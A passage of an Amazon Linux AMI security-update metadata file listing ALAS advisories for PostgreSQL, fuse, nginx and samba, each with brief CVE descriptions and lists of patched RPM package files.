arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package 
name="postgresql93-libs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.25-1.72.amzn1.i686.rpm</filename></package><package 
name="postgresql93-plpython27" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.25-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1118</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1118: important priority package update for postgresql95</title><issued date="2018-12-06 16:57:00" /><updated date="2018-12-07 01:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes of server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-static" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.15" release="1.80.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql95-libs-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.15" release="1.80.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql95-devel-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.15-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1119</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1119: important priority package update for postgresql96</title><issued date="2018-12-06 16:58:00" /><updated date="2018-12-07 01:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1115:
It was found that pg_catalog.pg_logfile_rotate(), from the adminpack extension, did not follow the same ACLs as pg_rotate_logfile. If the adminpack is added to a database, an attacker able to connect to it could use this flaw to force log rotation.
1573276:
CVE-2018-1115 postgresql: Too-permissive access control list on function pg_logfile_rotate()
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes of server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1115" title="" id="CVE-2018-1115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-contrib" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" 
version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.11-1.82.amzn1.i686.rpm</filename></package><package 
name="postgresql96-plpython27" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.11-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1123</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1123: medium priority package update for fuse</title><issued date="2019-04-17 18:45:00" /><updated date="2019-04-19 16:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10906:
A vulnerability was discovered in fuse. When SELinux is active, fusermount is vulnerable to a restriction bypass. This allows non-root users to mount a FUSE file system with the &#039;allow_other&#039; mount option regardless of whether &#039;user_allow_other&#039; is set in the fuse configuration. An attacker may use this flaw to mount a FUSE file system, accessible by other users, and trick them into accessing files on that file system, possibly causing Denial of Service or other unspecified effects.
1602996:
CVE-2018-10906 fuse: bypass of the "user_allow_other" restriction when SELinux is active
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10906" title="" id="CVE-2018-10906" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fuse-devel" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-devel-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-libs-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-debuginfo-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-libs-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-debuginfo-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse-devel" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-devel-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-2.9.4-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1125</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1125: medium priority package update for nginx</title><issued date="2018-12-13 17:27:00" /><updated date="2018-12-14 01:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2018-16844:
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the &#039;http2&#039; option of the &#039;listen&#039; directive is used in a configuration file.
1644510:
CVE-2018-16844 nginx: Excessive CPU usage via flaw in HTTP/2 implementation
CVE-2018-16843:
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the &#039;http2&#039; option of the &#039;listen&#039; directive is used in a configuration file.
1644511:
CVE-2018-16843 nginx: Excessive memory consumption via flaw in HTTP/2 implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16843" title="" id="CVE-2018-16843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16844" title="" id="CVE-2018-16844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.14.1" release="2.34.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.14.1-2.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1126</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1126: medium priority package update for 
samba</title><issued date="2019-01-22 17:55:00" /><updated date="2019-01-25 02:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1139:
A flaw was found in the way samba allowed the use of weak NTLMv1 authentication even when NTLMv1 was explicitly disabled. A man-in-the-middle attacker could use this flaw to read the credential and other details passed between the samba server and client.
1589651:
CVE-2018-1139 samba: Weak authentication protocol regression
CVE-2018-10858:
A heap-buffer overflow was found in the way samba clients processed an extra-long filename in a directory listing. A malicious samba server could use this flaw to cause arbitrary code execution on a samba client.
1612805:
CVE-2018-10858 samba: Insufficient input validation in libsmbclient
CVE-2018-1050:
A null pointer dereference flaw was found in Samba RPC external printer service. An attacker could use this flaw to cause the printer spooler service to crash.
1538771:
CVE-2018-1050 samba: NULL pointer dereference in printer server process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1050" title="" id="CVE-2018-1050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10858" title="" id="CVE-2018-10858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1139" title="" id="CVE-2018-1139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-winbind-krb5-locator" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libwbclient-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.8.3" release="4.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.8.3-4.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.8.3" release="4.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.8.3-4.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.8.3" release="4.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-test-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.8.3" 
